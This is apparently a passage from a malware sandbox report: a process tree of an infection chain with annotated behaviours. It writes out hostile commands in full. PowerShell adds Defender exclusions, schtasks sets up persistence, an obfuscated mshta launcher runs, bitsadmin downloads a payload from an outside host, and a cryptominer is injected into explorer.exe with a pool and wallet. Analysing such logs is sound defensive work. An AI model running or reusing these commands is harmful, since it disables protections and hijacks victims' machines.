C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=1520,17408968292246025603,11366447788368995181,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3388_121099319" --mojo-platform-channel-handle=2232 /prefetch:810⤵
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1520,17408968292246025603,11366447788368995181,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3388_121099319" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --mojo-platform-channel-handle=2636 /prefetch:110⤵
- Checks computer location settings
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=renderer --no-sandbox --file-url-path-alias="/gen=C:\Users\Admin\AppData\Roaming\Calculator\gen" --js-flags=--expose-gc --no-zygote --register-pepper-plugins=widevinecdmadapter.dll;application/x-ppapi-widevine-cdm --field-trial-handle=1520,17408968292246025603,11366447788368995181,131072 --lang=en-US --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3388_121099319" --nwjs --extension-process --ppapi-flash-path=pepflashplayer.dll --ppapi-flash-version=32.0.0.223 --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --mojo-platform-channel-handle=1844 /prefetch:110⤵
- Checks computer location settings
- Loads dropped DLL
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1520,17408968292246025603,11366447788368995181,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3388_121099319" --mojo-platform-channel-handle=2940 /prefetch:810⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=gpu-process --field-trial-handle=1520,17408968292246025603,11366447788368995181,131072 --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3388_121099319" --start-stack-profiler --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --use-gl=swiftshader-webgl --mojo-platform-channel-handle=3208 /prefetch:210⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1520,17408968292246025603,11366447788368995181,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3388_121099319" --mojo-platform-channel-handle=3696 /prefetch:810⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1520,17408968292246025603,11366447788368995181,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3388_121099319" --mojo-platform-channel-handle=3580 /prefetch:810⤵
- Suspicious use of SetThreadContext
- Modifies system certificate store
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1520,17408968292246025603,11366447788368995181,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3388_121099319" --mojo-platform-channel-handle=1864 /prefetch:810⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --field-trial-handle=1520,17408968292246025603,11366447788368995181,131072 --lang=en-US --service-sandbox-type=utility --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3388_121099319" --mojo-platform-channel-handle=3136 /prefetch:810⤵
-
C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe"C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --field-trial-handle=1520,17408968292246025603,11366447788368995181,131072 --lang=en-US --service-sandbox-type=none --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw3388_121099319" --mojo-platform-channel-handle=3492 /prefetch:810⤵
-
C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"7⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Users\Admin\AppData\Local\Temp\Chrome5.exe"8⤵
- Drops file in System32 directory
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit9⤵
- Executes dropped EXE
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"10⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"10⤵
-
C:\Windows\System32\cmd.exe"cmd" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"9⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr "C:\Windows\system32\services64.exe"10⤵
- Creates scheduled task(s)
-
C:\Windows\System32\cmd.exe"cmd" cmd /c "C:\Windows\system32\services64.exe"9⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV110⤵
-
C:\Windows\system32\services64.exeC:\Windows\system32\services64.exe10⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "C:\Windows\system32\services64.exe"11⤵
- Drops file in System32 directory
- Suspicious use of SetThreadContext
-
C:\Windows\System32\cmd.exe"cmd" cmd /c powershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force" & powershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force" & exit12⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionPath @(($pwd).path, $env:UserProfile,$env:AppData,$env:Temp,$env:SystemRoot,$env:HomeDrive,$env:SystemDrive) -Force"13⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command "Add-MpPreference -ExclusionExtension @('exe','dll') -Force"13⤵
-
C:\Windows\system32\Microsoft\Libs\sihost64.exe"C:\Windows\system32\Microsoft\Libs\sihost64.exe"12⤵
-
C:\Windows\System32\conhost.exe"C:\Windows\System32\conhost.exe" "/sihost64"13⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo="rx/0" --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=xmr-eu2.nanopool.org:14433 --user=41o1Bi5waqLgbkV653RD7zSYeXSWRu1wnEDzPgFDFwntSnuRx7g4HbHPqNDGS6BW1bget6yyHyrPbBcVsdR6Ebxd843bMuK.udda/password --pass= --cpu-max-threads-hint=30 --cinit-remote-config="v4Qq47ngFyBcSyO2uLKc6OAdluV/h8Wx+uVST9CwRTBBZDSizq+6yEkb73lzV2SG" --cinit-stealth-targets="+iU/trnPCTLD3p+slbva5u4EYOS6bvIPemCHGQx2WRUcnFdomWh6dhl5H5KbQCjp6yCYlsFu5LR1mi7nQAy56B+5doUwurAPvCael2sR/N4=" --cinit-idle-wait=5 --cinit-idle-cpu=60 --tls --cinit-stealth12⤵
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat14514904a4b.exe4⤵
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat14514904a4b.exeSat14514904a4b.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat142ac5249376e895.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat142ac5249376e895.exeSat142ac5249376e895.exe5⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c Sat1487ca754e680f91.exe4⤵
-
C:\Users\Admin\AppData\Local\Temp\7zS088B1E86\Sat1487ca754e680f91.exeSat1487ca754e680f91.exe5⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\x6z6NjXcCh4bSMjVQsnzBW81.exe"C:\Users\Admin\Pictures\Adobe Films\x6z6NjXcCh4bSMjVQsnzBW81.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\Hucq3cRU783T_YaR6f0rcMBe.exe"C:\Users\Admin\Pictures\Adobe Films\Hucq3cRU783T_YaR6f0rcMBe.exe"6⤵
- Executes dropped EXE
- Drops file in Program Files directory
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Documents\79BLy9HRraJ1saUAfrFwsTrz.exe"C:\Users\Admin\Documents\79BLy9HRraJ1saUAfrFwsTrz.exe"7⤵
- Checks computer location settings
-
C:\Users\Admin\Pictures\Adobe Films\Ks9QPIhrFFITQDkoX2Ao_qgs.exe"C:\Users\Admin\Pictures\Adobe Films\Ks9QPIhrFFITQDkoX2Ao_qgs.exe"8⤵
-
C:\Users\Admin\Pictures\Adobe Films\sfsmPN2Q4HWLk0HKJjUxzpM2.exe"C:\Users\Admin\Pictures\Adobe Films\sfsmPN2Q4HWLk0HKJjUxzpM2.exe" /mixtwo8⤵
-
C:\Users\Admin\Pictures\Adobe Films\4sJmy4OYqmAdZtWjrOficbSi.exe"C:\Users\Admin\Pictures\Adobe Films\4sJmy4OYqmAdZtWjrOficbSi.exe"8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\I1yxyBjCi2rjqqaotCgEwtTy.exe"C:\Users\Admin\Pictures\Adobe Films\I1yxyBjCi2rjqqaotCgEwtTy.exe"8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\yoX1lbJjB0CYEqqcW6Y2Yb_p.exe"C:\Users\Admin\Pictures\Adobe Films\yoX1lbJjB0CYEqqcW6Y2Yb_p.exe"8⤵
- Checks SCSI registry key(s)
- Suspicious behavior: MapViewOfSection
-
C:\Users\Admin\Pictures\Adobe Films\Vo1z98SLibb53bBUs5I2fSxG.exe"C:\Users\Admin\Pictures\Adobe Films\Vo1z98SLibb53bBUs5I2fSxG.exe"8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Windows\SysWOW64\mshta.exe"C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\Vo1z98SLibb53bBUs5I2fSxG.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\Vo1z98SLibb53bBUs5I2fSxG.exe"" ) do taskkill -f -iM ""%~NxM"" ", 0 , truE) )9⤵
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\Vo1z98SLibb53bBUs5I2fSxG.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\Vo1z98SLibb53bBUs5I2fSxG.exe" ) do taskkill -f -iM "%~NxM"10⤵
-
C:\Windows\SysWOW64\taskkill.exetaskkill -f -iM "Vo1z98SLibb53bBUs5I2fSxG.exe"11⤵
- Kills process with taskkill
-
C:\Users\Admin\Pictures\Adobe Films\aDm5wtNVVBVZLktXPpIsLYMC.exe"C:\Users\Admin\Pictures\Adobe Films\aDm5wtNVVBVZLktXPpIsLYMC.exe"8⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-3QBEU.tmp\aDm5wtNVVBVZLktXPpIsLYMC.tmp"C:\Users\Admin\AppData\Local\Temp\is-3QBEU.tmp\aDm5wtNVVBVZLktXPpIsLYMC.tmp" /SL5="$1044C,506127,422400,C:\Users\Admin\Pictures\Adobe Films\aDm5wtNVVBVZLktXPpIsLYMC.exe"9⤵
- Loads dropped DLL
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Local\Temp\is-EBTHO.tmp\DYbALA.exe"C:\Users\Admin\AppData\Local\Temp\is-EBTHO.tmp\DYbALA.exe" /S /UID=270910⤵
- Drops file in Drivers directory
-
C:\Users\Admin\AppData\Local\Temp\72-e098e-f8a-0809b-eff097f323a7b\Titalelome.exe"C:\Users\Admin\AppData\Local\Temp\72-e098e-f8a-0809b-eff097f323a7b\Titalelome.exe"11⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\kr1ib4i5.bq0\GcleanerEU.exe /eufive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\kr1ib4i5.bq0\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\kr1ib4i5.bq0\GcleanerEU.exe /eufive13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 10032 -s 66414⤵
- Program crash
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ah2ezu0k.ozd\installer.exe /qn CAMPAIGN="654" & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\ah2ezu0k.ozd\installer.exeC:\Users\Admin\AppData\Local\Temp\ah2ezu0k.ozd\installer.exe /qn CAMPAIGN="654"13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\0fohaslt.lqz\any.exe & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\0fohaslt.lqz\any.exeC:\Users\Admin\AppData\Local\Temp\0fohaslt.lqz\any.exe13⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\fxwco1eu.14j\gcleaner.exe /mixfive & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\fxwco1eu.14j\gcleaner.exeC:\Users\Admin\AppData\Local\Temp\fxwco1eu.14j\gcleaner.exe /mixfive13⤵
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8716 -s 64814⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8716 -s 66414⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8716 -s 62414⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 8716 -s 64414⤵
- Program crash
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\uganmcft.qiu\autosubplayer.exe /S & exit12⤵
-
C:\Users\Admin\AppData\Local\Temp\uganmcft.qiu\autosubplayer.exeC:\Users\Admin\AppData\Local\Temp\uganmcft.qiu\autosubplayer.exe /S13⤵
- Drops file in Program Files directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsaAD90.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsaAD90.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsaAD90.tmp\tempfile.ps1"14⤵
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV115⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsaAD90.tmp\tempfile.ps1"14⤵
- Suspicious use of SetThreadContext
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsaAD90.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsaAD90.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsaAD90.tmp\tempfile.ps1"14⤵
- Checks for any installed AV software in registry
-
C:\Windows\SysWOW64\bitsadmin.exe"bitsadmin" /Transfer helper http://fscloud.su/data/data.7z C:\zip.7z14⤵
- Download via BitsAdmin
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pcKaq2Eq28KXYPtY -y x C:\zip.7z -o"C:\Program Files\temp_files\"14⤵
-
C:\Program Files (x86)\lighteningplayer\data_load.exe"C:\Program Files (x86)\lighteningplayer\data_load.exe" -pIpp1OPsBdTop3OU -y x C:\zip.7z -o"C:\Program Files\temp_files\"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsaAD90.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsaAD90.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsaAD90.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsaAD90.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsaAD90.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\BtWbiTx\BtWbiTx.dll" BtWbiTx14⤵
-
C:\Windows\system32\rundll32.exeC:\Windows\System32\rundll32.exe "C:\Program Files (x86)\BtWbiTx\BtWbiTx.dll" BtWbiTx15⤵
- Drops file in System32 directory
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsaAD90.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsaAD90.tmp\tempfile.ps1"14⤵
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsaAD90.tmp\tempfile.ps1"14⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsaAD90.tmp\tempfile.ps1"14⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -inputformat none -ExecutionPolicy RemoteSigned -File "C:\Users\Admin\AppData\Local\Temp\nsaAD90.tmp\tempfile.ps1"14⤵
-
C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe"C:\Program Files (x86)\lighteningplayer\lighteningplayer-cache-gen.exe" C:\Program Files (x86)\lighteningplayer\plugins\ /SILENT14⤵
-
C:\Users\Admin\Pictures\Adobe Films\hffvrbh7XobMbZCDBVzFhfbk.exe"C:\Users\Admin\Pictures\Adobe Films\hffvrbh7XobMbZCDBVzFhfbk.exe"8⤵
-
C:\Users\Admin\AppData\Roaming\3639131.exe"C:\Users\Admin\AppData\Roaming\3639131.exe"9⤵
-
C:\Users\Admin\AppData\Roaming\8217699.exe"C:\Users\Admin\AppData\Roaming\8217699.exe"9⤵
-
C:\Users\Admin\AppData\Roaming\8217699.exe"C:\Users\Admin\AppData\Roaming\8217699.exe"10⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\AppData\Roaming\668961.exe"C:\Users\Admin\AppData\Roaming\668961.exe"9⤵
-
C:\Users\Admin\AppData\Roaming\7590801.exe"C:\Users\Admin\AppData\Roaming\7590801.exe"9⤵
- Checks computer location settings
- Suspicious behavior: SetClipboardViewer
-
C:\Users\Admin\AppData\Roaming\8061326.exe"C:\Users\Admin\AppData\Roaming\8061326.exe"9⤵
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST7⤵
- Creates scheduled task(s)
-
C:\Users\Admin\Pictures\Adobe Films\VcbaY0rxppQvxsF6Dhkdg4_f.exe"C:\Users\Admin\Pictures\Adobe Films\VcbaY0rxppQvxsF6Dhkdg4_f.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\oNHOyUQ3HKSKoT6WvbTWcZUk.exe"C:\Users\Admin\Pictures\Adobe Films\oNHOyUQ3HKSKoT6WvbTWcZUk.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\Dg_Ebh8ihIYC1JCfpRAyNWiT.exe"C:\Users\Admin\Pictures\Adobe Films\Dg_Ebh8ihIYC1JCfpRAyNWiT.exe"6⤵
- Executes dropped EXE
- Checks BIOS information in registry
- Checks whether UAC is enabled
- Suspicious use of NtSetInformationThreadHideFromDebugger
-
C:\Users\Admin\Pictures\Adobe Films\R9JjaNeErim9RBtGd3_3uQhr.exe"C:\Users\Admin\Pictures\Adobe Films\R9JjaNeErim9RBtGd3_3uQhr.exe"6⤵
-
C:\Users\Admin\Pictures\Adobe Films\R9JjaNeErim9RBtGd3_3uQhr.exe"C:\Users\Admin\Pictures\Adobe Films\R9JjaNeErim9RBtGd3_3uQhr.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\PpRYTY3XAHm45YE_1aQu6ef5.exe"C:\Users\Admin\Pictures\Adobe Films\PpRYTY3XAHm45YE_1aQu6ef5.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\build.exe"C:\Users\Admin\AppData\Local\Temp\build.exe"7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\pkEHV3QnxJNQawwSUY_T9v6l.exe"C:\Users\Admin\Pictures\Adobe Films\pkEHV3QnxJNQawwSUY_T9v6l.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
-
C:\Users\Admin\Pictures\Adobe Films\pkEHV3QnxJNQawwSUY_T9v6l.exe"C:\Users\Admin\Pictures\Adobe Films\pkEHV3QnxJNQawwSUY_T9v6l.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\sDpSUCcF7crBKFAL0nlkdsFL.exe"C:\Users\Admin\Pictures\Adobe Films\sDpSUCcF7crBKFAL0nlkdsFL.exe"6⤵
- Executes dropped EXE
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5728 -s 6567⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5728 -s 6727⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5728 -s 6287⤵
- Program crash
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5728 -s 6527⤵
- Program crash
-
C:\Users\Admin\Pictures\Adobe Films\BeNlWgh16GLAdiYLOwOe1lqZ.exe"C:\Users\Admin\Pictures\Adobe Films\BeNlWgh16GLAdiYLOwOe1lqZ.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"C:\Program Files (x86)\Company\NewProduct\DownFlSetup999.exe"7⤵
-
C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"C:\Program Files (x86)\Company\NewProduct\md8_8eus.exe"7⤵
- Checks whether UAC is enabled
-
C:\Program Files (x86)\Company\NewProduct\inst3.exe"C:\Program Files (x86)\Company\NewProduct\inst3.exe"7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Program Files (x86)\Company\NewProduct\cutm3.exe"C:\Program Files (x86)\Company\NewProduct\cutm3.exe"7⤵
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\ghyLwzsW68yJrRDdcOnQsReb.exe"C:\Users\Admin\Pictures\Adobe Films\ghyLwzsW68yJrRDdcOnQsReb.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\ghyLwzsW68yJrRDdcOnQsReb.exe"C:\Users\Admin\Pictures\Adobe Films\ghyLwzsW68yJrRDdcOnQsReb.exe"7⤵
-
C:\Users\Admin\Pictures\Adobe Films\1luUodQBKunwgCepAZE5m_rN.exe"C:\Users\Admin\Pictures\Adobe Films\1luUodQBKunwgCepAZE5m_rN.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\B_jeA9OMEfd0MmBnOrj56I2B.exe"C:\Users\Admin\Pictures\Adobe Films\B_jeA9OMEfd0MmBnOrj56I2B.exe"6⤵
- Executes dropped EXE
-
C:\Users\Admin\Pictures\Adobe Films\Knv5tLGcITqzriOiFtbYIHkp.exe"C:\Users\Admin\Pictures\Adobe Films\Knv5tLGcITqzriOiFtbYIHkp.exe"6⤵
- Executes dropped EXE
- Suspicious use of SetWindowsHookEx
-
C:\Users\Admin\Pictures\Adobe Films\6PzDKqTumYc6wQmCZmE1EFMz.exe"C:\Users\Admin\Pictures\Adobe Films\6PzDKqTumYc6wQmCZmE1EFMz.exe"6⤵
-
